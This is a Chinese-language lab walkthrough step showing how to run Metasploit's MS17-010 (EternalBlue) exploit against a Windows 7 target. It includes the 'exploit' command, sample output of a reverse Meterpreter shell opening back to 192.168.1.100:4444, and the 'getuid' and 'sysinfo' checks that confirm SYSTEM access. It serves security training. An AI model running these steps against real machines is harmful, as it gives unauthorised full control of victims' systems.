执行漏洞利用并建立 Meterpreter 会话
在此步骤中,所有选项都已配置完毕,你将启动漏洞利用并控制目标机器。
所有准备工作都已完成。漏洞利用已选定,目标已设置,payload 也已选择。要发起攻击,只需使用 exploit 命令。
exploit
Metasploit 现在将尝试利用目标上的漏洞。在执行过程中,你将看到一些状态消息。如果成功,漏洞利用将传递 Meterpreter payload,你将看到一条指示“WIN!”的消息,并表明已打开一个新会话。
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400
meterpreter >
meterpreter > 提示符表示成功!你现在拥有了受害者机器上的一个远程 shell。为了证明你的控制权,运行 getuid 命令来查看你当前是以哪个用户账户运行的。
getuid
输出应为:
Server username: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM 是 Windows 系统上的最高权限级别。你已成功攻陷目标。你还可以运行 sysinfo 来获取系统信息。
sysinfo
Computer : WIN7-VICTIM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
恭喜你,你已成功利用了 MS17-010。